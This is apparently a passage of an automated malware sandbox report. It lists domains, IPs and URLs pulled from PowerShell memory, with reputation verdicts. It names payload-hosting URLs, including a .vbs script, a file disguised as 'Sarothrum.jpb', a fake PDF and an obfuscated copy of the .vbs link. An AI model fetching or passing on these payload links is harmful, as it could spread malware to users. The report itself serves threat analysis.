          https://www.almrwad.com/w0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/Sar100%Avira URL Cloudphishing
          https://www.fornid.com/ordine0%Avira URL Cloudsafe
          https://www.fornid.com/sitemap0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Sarot0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Saroth0%Avira URL Cloudsafe
          https://www.fornid.com/314-scarpe-antinfortunistiche-e-stivale-da-lavoro0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Sarothru0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/Sarothrum.j100%Avira URL Cloudphishing
          https://www.pineappletech.ae/ov/wh.vbs100%Avira URL Cloudmalware
          https://www.fornid.com/wh/List0%Avira URL Cloudsafe
          https://www.fornid.com/145-maschere-antigas0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Sar0%Avira URL Cloudsafe
          http://www.almrwad.com0%Avira URL Cloudsafe
          https://www.almrwad.com/0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/Sarothrum.100%Avira URL Cloudphishing
          https://www.fornid.com/il-mio-account0%Avira URL Cloudsafe
          https://www.erp-royal-crown.in0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/Sarothr100%Avira URL Cloudphishing
          https://www.almrwad.com/wh/Sarothrum0%Avira URL Cloudsafe
          http://almrwad.comp0%Avira URL Cloudsafe
          http://erp-royal-crown.info100%Avira URL Cloudphishing
          https://www.almrwad.co0%Avira URL Cloudsafe
          http://www.erp-royal-crown.info100%Avira URL Cloudphishing
          https://www.almrwad.com/wh/Sarothrum.j0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info100%Avira URL Cloudphishing
          https://www.fornid.com/90-maschere-per-saldatura0%Avira URL Cloudsafe
          https://www.almrwad.c0%Avira URL Cloudsafe
          https://www.pinzmhapplzmhtzmhch.azmh/ov/wh.vbs0%Avira URL Cloudsafe
          https://www.fornid.com/img/logo.jpg0%Avira URL Cloudsafe
          https://www.almrwad.com/wh0%Avira URL Cloudsafe
          https://www.erp-royal-crown.i0%Avira URL Cloudsafe
          https://www.fornid.com/themes/PRS070158/css/megnor/custom.css0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/Sarothru100%Avira URL Cloudphishing
          https://www.erp-royal-crown.info/wh/Sarothrum.jp100%Avira URL Cloudphishing
          http://www.pineappletech.ae0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Sarothrum.jp0%Avira URL Cloudsafe
          https://www.fornid.com/133-occhiali-protettivi0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/Sarothrum.jpb100%Avira URL Cloudmalware
          https://www.erp-royal-crown.info/wh/100%Avira URL Cloudphishing
          http://blog.fornid.com/0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/Sarot100%Avira URL Cloudphishing
          https://www.fornid.com/contattaci0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/Sa100%Avira URL Cloudphishing
          https://www.erp-royal-crown.info/wh/Saro100%Avira URL Cloudphishing
          https://go.micro0%Avira URL Cloudsafe
          http://pesterbdd.com/images/Pester.png0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Sarothrum.jpb0%Avira URL Cloudsafe
          http://crl.mX0%Avira URL Cloudsafe
          http://www.fornid.com/content/13-international-shipments0%Avira URL Cloudsafe
          https://www.almrwad.0%Avira URL Cloudsafe
          https://www.fornid.com0%Avira URL Cloudsafe
          http://www.fornid.com0%Avira URL Cloudsafe
          http://www.fornid.com/0%Avira URL Cloudsafe
          https://www.almrwad.com0%Avira URL Cloudsafe
          https://www.fornid.com/cerca0%Avira URL Cloudsafe
          https://www.fornid.com/wh/List%20of%20required%20items%20and%20services.pdf100%Avira URL Cloudmalware
          https://www.almrwad.com/wh/Saro0%Avira URL Cloudsafe
          http://almrwad.com0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/S0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Sa0%Avira URL Cloudsafe
          https://www.fornid.com/144-filtri-per-maschere0%Avira URL Cloudsafe
          https://www.erp-royal-crown.inf0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/100%Avira URL Cloudphishing
          https://www.erp-royal-crown.info/wh/Sarothrum100%Avira URL Cloudphishing
          https://www.erp-royal-crown.info/w100%Avira URL Cloudphishing
          https://www.fornid.com/62-mascherine-protettive-ffp1-ffp2-ffp30%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/S100%Avira URL Cloudphishing
          https://www.pineappletech.ae0%Avira URL Cloudsafe
          https://www.erp-royal-crown.0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh100%Avira URL Cloudphishing
          https://www.almrwad.com/wh/Sarothr0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/Saroth100%Avira URL Cloudphishing
          https://www.almrwad.com/wh/Sarothrum.0%Avira URL Cloudsafe
          http://fornid.com0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          erp-royal-crown.info
          		148.251.114.233
          		truefalse
            		unknown
            almrwad.com
            		184.171.244.231
            		truefalse
              		unknown
              fornid.com
              		93.95.216.175
              		truetrue
                		unknown
                www.pineappletech.ae
                		91.193.42.13
                		truefalse
                  		unknown
                  www.fornid.com
                  		unknown
                  		unknowntrue
                    		unknown
                    www.almrwad.com
                    		unknown
                    		unknownfalse
                      		unknown
                      www.erp-royal-crown.info
                      		unknown
                      		unknownfalse
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://www.pineappletech.ae/ov/wh.vbstrue
                        • Avira URL Cloud: malware
                        		unknown
                        https://www.erp-royal-crown.info/wh/Sarothrum.jpbtrue
                        • Avira URL Cloud: malware
                        		unknown
                        https://www.almrwad.com/wh/Sarothrum.jpbfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.fornid.com/wh/List%20of%20required%20items%20and%20services.pdffalse
                        • Avira URL Cloud: malware
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://www.almrwad.com/wpowershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.almrwad.com/wh/Sarothrupowershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.fornid.com/sitemappowershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.fornid.com/wh/List%20of%20rzmhquirzmhd%20itzmhms%20and%20szmhrviczmhs.pdfpowershell.exe, 00000000.00000002.2327446000.0000023901632000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.erp-royal-crown.info/wh/Sarothrum.jpowershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmptrue
                        • Avira URL Cloud: phishing
                        		unknown
                        https://www.almrwad.com/wh/Sarothpowershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.fornid.com/314-scarpe-antinfortunistiche-e-stivale-da-lavoropowershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.erp-royal-crown.info/wh/Sarpowershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmptrue
                        • Avira URL Cloud: phishing
                        		unknown
                        https://www.fornid.com/ordinepowershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.almrwad.com/wh/Sarotpowershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.fornid.com/145-maschere-antigaspowershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2327446000.0000023901B1E000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.fornid.com/wh/Listpowershell.exe, 00000000.00000002.2327446000.0000023901632000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contoso.com/Licensepowershell.exe, 00000007.00000002.3482512250.00000263D06D2000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://www.almrwad.com/wh/Sarpowershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.fornid.com/il-mio-accountpowershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.almrwad.compowershell.exe, 00000007.00000002.3388724978.00000263C0D59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C11E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C195D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C1684000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0B10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C14EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C1727000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0DA6000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.erp-royal-crown.inpowershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.erp-royal-crown.info/wh/Sarothrum.powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: phishing
                          		unknown
                          http://go.microspowershell.exe, 00000003.00000002.2190793958.000001DAB8199000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://www.almrwad.com/powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.erp-royal-crown.info/wh/Sarothrpowershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: phishing
                            		unknown
                            http://almrwad.comppowershell.exe, 00000007.00000002.3388724978.00000263C0DA6000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.almrwad.com/wh/Sarothrumpowershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.erp-royal-crown.infopowershell.exe, 00000007.00000002.3388724978.00000263C1C21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C2330000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C116E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C11E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0B10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C18E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C15CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C1727000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0DA6000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: phishing
                            		unknown
                            https://www.almrwad.copowershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.almrwad.com/wh/Sarothrum.jpowershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://erp-royal-crown.infopowershell.exe, 00000007.00000002.3388724978.00000263C1C21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C2330000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C116E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C11E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0B10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C18E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C15CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C1727000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0DA6000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: phishing
                            		unknown
                            https://www.almrwad.cpowershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.erp-royal-crown.infopowershell.exe, 00000007.00000002.3388724978.00000263C1C21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C074E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C1521000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C116E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C11E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C09F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0B10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C18E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C1FD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C1727000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0DA6000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: phishing
                            		unknown
                            https://www.fornid.com/90-maschere-per-saldaturapowershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://contoso.com/powershell.exe, 00000007.00000002.3482512250.00000263D06D2000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.2400652057.000002391006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2400652057.00000239101B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2216082915.000001DAC7780000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3482512250.00000263D058F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3482512250.00000263D06D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://www.pinzmhapplzmhtzmhch.azmh/ov/wh.vbspowershell.exe, 00000000.00000002.2327446000.0000023901CA3000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.fornid.com/img/logo.jpgpowershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.pineappletech.aepowershell.exe, 00000000.00000002.2327446000.0000023901F73000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.almrwad.com/whpowershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.fornid.com/133-occhiali-protettivipowershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.erp-royal-crown.ipowershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.erp-royal-crown.info/wh/Sarothrupowershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: phishing
                                		unknown
                                https://www.erp-royal-crown.info/wh/Sarothrum.jppowershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: phishing
                                		unknown
                                https://www.fornid.com/themes/PRS070158/css/megnor/custom.csspowershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.2327446000.0000023900001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2190793958.000001DAB7711000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0521000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.almrwad.com/wh/Sarothrum.jppowershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://www.erp-royal-crown.info/wh/powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: phishing
                                  		unknown
                                  http://blog.fornid.com/powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://www.erp-royal-crown.info/wh/Saropowershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: phishing
                                  		unknown
                                  https://www.erp-royal-crown.info/wh/Sarotpowershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: phishing
                                  		unknown
                                  http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.2400652057.000002391006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2400652057.00000239101B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2216082915.000001DAC7780000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3482512250.00000263D058F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3482512250.00000263D06D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000003.00000002.2190793958.000001DAB793A000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://www.fornid.com/contattacipowershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000007.00000002.3388724978.00000263C074E000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.almrwad.com/wh/powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.2190793958.000001DAB793A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000007.00000002.3388724978.00000263C074E000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.erp-royal-crown.info/wh/Sapowershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: phishing
                                          		unknown
                                          https://go.micropowershell.exe, 00000000.00000002.2327446000.0000023900C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2190793958.000001DAB8D46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2190793958.000001DAB8199000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2190793958.000001DAB7DBE000.00000004.00000800.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.fornid.com/content/13-international-shipmentspowershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://crl.mXpowershell.exe, 00000003.00000002.2219212023.000001DACF81F000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://contoso.com/Iconpowershell.exe, 00000007.00000002.3482512250.00000263D06D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.almrwad.powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 00000003.00000002.2190793958.000001DAB8D46000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.almrwad.compowershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C11E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C195D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C1684000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0B10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C14EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C1727000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0DA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.fornid.compowershell.exe, 00000000.00000002.2327446000.0000023901632000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.jspowershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.jspowershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://github.com/Pester/Pesterpowershell.exe, 00000007.00000002.3388724978.00000263C074E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.fornid.compowershell.exe, 00000000.00000002.2327446000.0000023901AFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.fornid.com/powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.fornid.com/cercapowershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.almrwad.com/wh/Saropowershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.erp-royal-crown.info/powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: phishing
                                                    		unknown
                                                    https://www.erp-royal-crown.infpowershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://almrwad.compowershell.exe, 00000007.00000002.3388724978.00000263C0D59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C11E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C195D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C1684000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0B10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C14EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C1727000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0DA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.fornid.com/144-filtri-per-mascherepowershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2327446000.0000023901B1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.almrwad.com/wh/Sapowershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.2190793958.000001DAB793A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.almrwad.com/wh/Spowershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://www.erp-royal-crown.info/wh/Sarothrumpowershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: phishing
                                                      		unknown
                                                      https://www.fornid.com/62-mascherine-protettive-ffp1-ffp2-ffp3powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2327446000.0000023901B1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://www.erp-royal-crown.info/wpowershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: phishing
                                                      		unknown
                                                      https://www.erp-royal-crown.info/wh/Spowershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: phishing
                                                      		unknown
                                                      https://www.pineappletech.aepowershell.exe, 00000000.00000002.2327446000.0000023901CA3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://aka.ms/pscore68powershell.exe, 00000000.00000002.2327446000.0000023900001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2190793958.000001DAB7711000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0521000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.almrwad.com/wh/Sarothrpowershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://www.erp-royal-crown.powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://www.almrwad.com/wh/Sarothrum.powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://www.erp-royal-crown.info/wh/Sarothpowershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmptrue
                                                        • Avira URL Cloud: phishing
                                                        		unknown
                                                        http://fornid.compowershell.exe, 00000000.00000002.2327446000.0000023901AFC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
